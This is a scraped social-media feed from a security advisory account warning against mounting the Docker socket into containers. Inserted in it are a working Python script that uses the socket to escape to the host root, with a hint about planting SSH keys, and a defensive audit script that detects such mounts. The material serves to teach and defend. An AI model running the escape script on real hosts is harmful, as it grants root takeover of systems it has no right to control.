ReynardSec (@reynardsec.bsky.social)
Your Cybersecurity Advisor - https://reynardsec.com/en/
ItSec (walking by): You pay for updates & support, probably, but you can do some of this yourselves with a bit of k8s hacking.

devops0: How, exactly?

👉 infosec.exchange/@reynardsec/...
Linked post (ReynardSec on infosec.exchange, with 1 image): "A grumpy ItSec guy walks through the office when he overhears an exchange of words. devops0: These k8s security SaaS prices are wild. devops1: Image scanning, policy engines, "ente..."
September 2, 2025 at 7:06 AM
How the pivot works (example): From the compromised container, talk to docker.sock and create a helper container that bind-mounts the host root at /host (rw). Then start it. Now you can operate on /host: add SSH keys, read secrets, drop binaries, even chroot. All via the REST API using simple curl calls.
August 27, 2025 at 6:29 PM
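The pivot described in the post above, written out as an added example (this is not ReynardSec's code and nothing from the post). It uses only Python's standard library to speak HTTP/1.1 over the UNIX socket, exactly what curl --unix-socket does: ping the daemon, create a helper container whose HostConfig binds the host root read-write at /host, start it, wait for it, and demultiplex its logs. The image name alpine:3.20 and the command "id; ls /host" are assumptions for illustration; any image already present on the host and any command you want run against /host will do. The Docker stream frame layout (1 byte stream type, 3 bytes padding, 4-byte big-endian length) is the documented format for non-TTY attach/logs output.

```python
"""Added example, not from the original post: drive the Docker Engine REST API
over /var/run/docker.sock with Python's standard library only."""
import http.client
import json
import os
import socket
import struct

SOCKET_PATH = "/var/run/docker.sock"  # default Docker Engine socket


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP/1.1 client whose transport is an AF_UNIX socket instead of TCP."""

    def __init__(self, path, timeout=30):
        super().__init__("localhost", timeout=timeout)  # Host header value is irrelevant to the daemon
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.connect(self.unix_path)


def api(method, path, body=None, socket_path=SOCKET_PATH):
    """One request against the Engine API; returns (status, raw_body)."""
    conn = UnixHTTPConnection(socket_path)
    headers, data = {}, None
    if body is not None:
        data = json.dumps(body).encode()
        headers["Content-Type"] = "application/json"
    try:
        conn.request(method, path, body=data, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def helper_container_spec(image, cmd):
    """Body for POST /containers/create: host root bind-mounted rw at /host."""
    return {
        "Image": image,
        "Cmd": list(cmd),
        "Tty": False,  # non-TTY: logs come back as multiplexed frames (see demux below)
        "HostConfig": {"Binds": ["/:/host:rw"]},
    }


def demux_docker_stream(data):
    """Split a non-TTY attach/logs stream into (stdout, stderr).
    Frame: 1 byte type (1=stdout, 2=stderr), 3 bytes padding, 4-byte BE length, payload."""
    out, err = bytearray(), bytearray()
    i = 0
    while i + 8 <= len(data):
        stream_type, length = struct.unpack(">B3xI", data[i:i + 8])
        payload = data[i + 8:i + 8 + length]
        if stream_type == 1:
            out.extend(payload)
        elif stream_type == 2:
            err.extend(payload)
        i += 8 + length
    return bytes(out), bytes(err)


def pivot(image="alpine:3.20", cmd=("sh", "-c", "id; ls /host")):
    """Create, run and read back a helper container that sees the host root at /host."""
    status, _ = api("GET", "/_ping")
    if status != 200:
        raise RuntimeError(f"daemon unreachable, status {status}")
    status, raw = api("POST", "/containers/create", helper_container_spec(image, cmd))
    if status != 201:  # 404 here usually means the image is not pulled on the host
        raise RuntimeError(f"create failed: {status} {raw!r}")
    cid = json.loads(raw)["Id"]
    api("POST", f"/containers/{cid}/start")  # 204 on success
    api("POST", f"/containers/{cid}/wait")   # blocks until cmd exits
    _, logs = api("GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
    api("DELETE", f"/containers/{cid}")      # remove the helper again
    return demux_docker_stream(logs)


if __name__ == "__main__":
    if os.path.exists(SOCKET_PATH):
        out, err = pivot()
        print(out.decode(errors="replace"), err.decode(errors="replace"))
    else:
        print("no docker.sock here; nothing to pivot through")
```

Run it inside a container that has the socket mounted and the output of id (uid=0 in the helper) plus a directory listing of the host's / comes back; swapping cmd for something that appends to /host/root/.ssh/authorized_keys is the "add SSH keys" step from the post. Nothing here needs elevated privileges in the calling container beyond read/write on the socket, which is the whole point.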
Dangerous pattern:

docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04

This gives the container full control of the Docker daemon. If an attacker gets code exec (RCE, deserialization, etc.), they can pivot from that container to the Docker host. Please do not do this!
August 27, 2025 at 6:29 PM
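An added check for the dangerous pattern in the post above (this is not code from ReynardSec's post): it walks the JSON that docker inspect prints and flags any container that has the Docker socket bind-mounted, plus any container with the host root bind-mounted, which is what the helper container from the pivot looks like once it exists. The sample inspect output below is constructed, trimmed to the fields the audit reads; /run/docker.sock is included alongside /var/run/docker.sock as an assumed alternate socket location.

```python
"""Added example, not from the original post: audit `docker inspect` output for
docker.sock mounts and host-root mounts. Sample input is constructed."""
import json
import os
import sys

# Assumed socket locations; /var/run/docker.sock is the Docker default.
DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}


def _bind_mounts(container):
    """Return {destination: (source, rw)} for every bind mount, merging the
    Mounts list (what the daemon set up) with HostConfig.Binds (what was
    requested, in 'src:dst' or 'src:dst:opts' form)."""
    mounts = {}
    for m in container.get("Mounts") or []:
        if m.get("Type") == "bind":
            mounts[os.path.normpath(m["Destination"])] = (
                os.path.normpath(m["Source"]), bool(m.get("RW", True)))
    for bind in container.get("HostConfig", {}).get("Binds") or []:
        parts = bind.split(":")
        if len(parts) < 2:
            continue
        opts = parts[2].split(",") if len(parts) > 2 else []
        mounts.setdefault(os.path.normpath(parts[1]),
                          (os.path.normpath(parts[0]), "ro" not in opts))
    return mounts


def audit_container(container):
    """Findings for one inspect object; an empty list means nothing flagged."""
    name = container.get("Name", "").lstrip("/") or container.get("Id", "")[:12]
    findings = []
    for dst, (src, rw) in _bind_mounts(container).items():
        if src in DOCKER_SOCKETS:
            findings.append(f"{name}: Docker socket {src} mounted at {dst}; "
                            "code exec inside this container controls the daemon")
        elif src == "/":
            findings.append(f"{name}: host root bind-mounted at {dst} "
                            f"({'rw' if rw else 'ro'}); this is the pivot helper pattern")
    return findings


def audit_inspect_json(text):
    """Run audit_container over the JSON array that `docker inspect` prints."""
    findings = []
    for c in json.loads(text):
        findings.extend(audit_container(c))
    return findings


# Constructed sample, not real output: one socket mount, one host-root helper, one clean bind.
SAMPLE_INSPECT = json.dumps([
    {"Id": "0123456789abcdef", "Name": "/ci-runner",
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Id": "fedcba9876543210", "Name": "/helper",
     "HostConfig": {"Binds": ["/:/host:rw"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": True}]},
    {"Id": "1111222233334444", "Name": "/web",
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html", "RW": False}]},
])

if __name__ == "__main__":
    # Pipe real data in: docker inspect $(docker ps -q) | python3 audit.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INSPECT
    for line in audit_inspect_json(text) or ["no findings"]:
        print(line)
```

Run stand-alone it reports ci-runner and helper and stays quiet about web; pipe docker inspect $(docker ps -q) into it to check a real host. Reading both Mounts and HostConfig.Binds matters because a container created through the API with Binds but not yet started may have an empty Mounts list.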
Why it matters: The Docker CLI talks to the Docker daemon over a UNIX socket (/var/run/docker.sock). That socket exposes the Docker Engine REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. That's the oops pattern.
August 27, 2025 at 6:28 PM
ItSec: Quick test - if curl to docker.sock returns JSON, you've handed over admin of the Docker daemon. Please don't do that; it's root-by-proxy...
August 27, 2025 at 6:28 PM
There is even more: for example, as a bonus, in point 001 there's an interesting analysis of the incorrect configuration of PCR banks in the LUKS disk encryption process.
August 25, 2025 at 1:27 PM
August 20, 2025 at 1:35 PM